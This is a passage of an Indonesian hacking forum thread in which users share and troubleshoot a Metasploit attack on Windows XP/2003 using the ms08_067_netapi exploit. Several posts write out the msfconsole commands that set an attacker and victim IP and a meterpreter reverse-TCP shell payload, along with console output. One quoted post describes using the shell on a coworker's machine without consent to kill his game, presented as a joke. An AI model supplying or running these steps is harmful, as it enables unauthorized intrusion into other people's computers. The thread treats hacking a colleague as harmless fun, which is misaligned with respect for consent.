Exploit Windows ga pake Backdoor + ngerjain temen
#31
(01-31-2012, 08:26 AM)one Wrote: kok punya ane gini terus ya bro
<code>

msf exploit(ms08_067_netapi) > set LHOST 172.16.21.190
LHOST => 172.16.21.190
msf exploit(ms08_067_netapi) > set RHOST 172.16.21.141
RHOST => 172.16.21.141
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.21.190:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Ultimate - (Build 7600) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit exception: No matching target
[*] Exploit completed, but no session was created.
</code>

Exploit itu cm brlaku dikalangan windows xp kebawah (2003, 2k, 98)

#32
(06-27-2012, 12:27 AM)konspirasi Wrote:
(06-27-2012, 12:05 AM)anon03 Wrote:
(01-24-2012, 03:29 PM)kuch1k1 Wrote: Permisi
si NEWBIE numpang post Big Grin
maap yah om momod kalo ga bermanfaat, boleh di hapus aja

Ini sebenarnya terinspirasi dari ebooknya milik orang india
kayanya orang disni udah pada tau semua deh
tapi aku share aja siapa tau masih ada yang belom tau
disini aku ganti payloadnya pake meterpreter dan berhasil.
oke langsung aja ke tkp

Victim-nya om
Spoiler! :
Windows 2000 Universal
Windows 2003 SP1 Japanese (NO NX)
Windows 2003 SP2 English (NO NX)
Windows 2003 SP2 English (NX)
Windows 2003 SP2 German (NO NX)
Windows 2003 SP2 German (NX)
Windows XP SP2 Arabic (NX)
Windows XP SP2 Chinese - Traditional / Taiwan (NX)
Windows XP SP2 Chinese - Simplified (NX)
Windows XP SP2 Chinese - Traditional (NX)
Windows XP SP2 Czech (NX)
Windows XP SP0/SP1 Universal
Windows XP SP2 Danish (NX)
Windows XP SP2 German (NX)
Windows XP SP2 Greek (NX)
Windows XP SP2 Spanish (NX)
Windows XP SP2 Finnish (NX)
Windows XP SP2 French (NX)
Windows XP SP2 Hebrew (NX)
Windows XP SP2 Hungarian (NX)
Windows XP SP2 Italian (NX)
Windows XP SP2 Japanese (NX)
Windows XP SP2 English (AlwaysOn NX)
Windows XP SP2 Korean (NX)
Windows XP SP2 Dutch (NX)
Windows XP SP2 Norwegian (NX)
Windows XP SP2 Polish (NX)
Windows XP SP2 Portuguese - Brazilian (NX)
Windows XP SP2 Portuguese (NX)
Windows XP SP2 Russian (NX)
Windows XP SP2 Swedish (NX)
Windows XP SP2 Turkish (NX)
Windows XP SP3 Arabic (NX)
Windows XP SP2 English (NX)
Windows XP SP3 Chinese - Traditional / Taiwan (NX)
Windows XP SP3 Chinese - Simplified (NX)
Windows XP SP3 Chinese - Traditional (NX)
Windows XP SP3 Czech (NX)
Windows XP SP3 Danish (NX)
Windows XP SP3 German (NX)
Windows XP SP3 Greek (NX)
Windows XP SP3 Spanish (NX)
Windows XP SP3 Finnish (NX)
Windows XP SP3 French (NX)
Windows XP SP3 English (AlwaysOn NX)
Windows XP SP3 Hebrew (NX)
Windows XP SP3 Hungarian (NX)
Windows XP SP3 Italian (NX)
Windows XP SP3 Japanese (NX)
Windows XP SP3 Korean (NX)
Windows XP SP3 Dutch (NX)
Windows XP SP3 Norwegian (NX)
Windows XP SP3 Polish (NX)
Windows XP SP3 Portuguese - Brazilian (NX)
Windows XP SP3 Portuguese (NX)
Windows XP SP3 English (NX)
Windows XP SP3 Russian (NX)
Windows XP SP3 Swedish (NX)
Windows XP SP3 Turkish (NX)
Windows 2003 SP2 Japanese (NO NX)
Windows 2003 SP0 Universal
Windows 2003 SP1 English (NO NX)
Windows 2003 SP1 English (NX)

Attacker : Backtrack 5 r1

buka console ketik

Code:
#msfconsole

setelah terbukan metasploit consolenya langsung cari module netapi-nya ketik

Code:
msf >search netapi

setelah ketemu langsung aja ketik seperti berikut ini

Code:
use windows/smb/ms08_067_netapi
>set LHOST 192.168.0.126 <== IP Attacker
>set RHOST 192.168.0.115 <== IP Victim
>set payload windows/meterpreter/reverse_tcp
>exploit

Jika berhasil maka akan seperti berikut
Spoiler! :
[Image: 10n72ma.png]
setelah itu terserah deh om mau apain tuh target
kalo aku isengin temen satu kerjaan yang kerjaannya maen game terus
simpel aja cara buat isenginnya

Code:
meterpreter >ps

maka akan tampil
Spoiler! :
[Image: 2ymakwz.png]
langsung aku kill aja tuh game eco.exe nya dengan perintah

Code:
meterpreter >kill 2920

langsung DC tuh game
hehehhe
maap yah tmn ku abis maen game mulu sih Big Grin

sekian yang bisa aku sampaikan
semoga bisa bermafaat

CMIIW

om.,
ane mau tanya nie.,. Angry Angry
tadinya sie ane bisa N work di korban.,
tapi setelaha ne update kok jadi gni y om??

[Image: 1e2hya.png]

mohon pencerahanya y om

udah ga ada di helpnya Tongue
selalu perhatikan changelog ketika akan melakukan update program :tkp:
terus solusinya gmn om,.,.????

maklum pengguna baru

Angry
Dari Hati Untuk Raga dan Untuk Kalian

#33
klo masih mau pake yg lama ya downgrade Tongue

#34
(06-27-2012, 11:36 PM)konspirasi Wrote: klo masih mau pake yg lama ya downgrade Tongue

nah itu dia om.,.
ane cari2 di eang google lumz ketemu.,.
mohon bantuannya di mari y om

http://forum.indonesianbacktrack.or.id/s...p?tid=2951 Big Grin
Dari Hati Untuk Raga dan Untuk Kalian

#35
waah, ternyata ada trik yg simple.
nice share om.

#36
(07-28-2012, 03:14 AM)devilnoe Wrote: waah, ternyata ada trik yg simple.
nice share om.

Simpel sih simpel
tapi udah ketinggalan jaman
walau masih banyak yang peke wedus xp

harus nemuin lg yang terbaru exploitnya Confused
Code:
99% [=====================================> ] 325,748,506 46.2K/s eta 75s

#37
(06-27-2012, 11:36 PM)konspirasi Wrote: klo masih mau pake yg lama ya downgrade Tongue

bisa kok om,
ps -A
[shcode=This_site_xss-ed]

#38
Saya punya malah kayak gini :

[shcode=bash]msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.105:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.1.106:445).
msf exploit(ms08_067_netapi) > exploit
[/shcode]

#39
@Doel ada beberapa kemungkinan om
- target mati
- ip nya ngga konek
- firewall target idup. jadi otomatis paket yang dikirim langsung di drop

#40
(08-28-2013, 08:47 PM)alkaaf Wrote: @Doel ada beberapa kemungkinan om
- target mati
- ip nya ngga konek
- firewall target idup. jadi otomatis paket yang dikirim langsung di drop

Firewallnya udah ku matiin, tapi ada masalah lagi :

[shcode=bash]
[*] Started reverse handler on 192.168.1.105:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[/shcode]






Users browsing this thread: 1 Guest(s)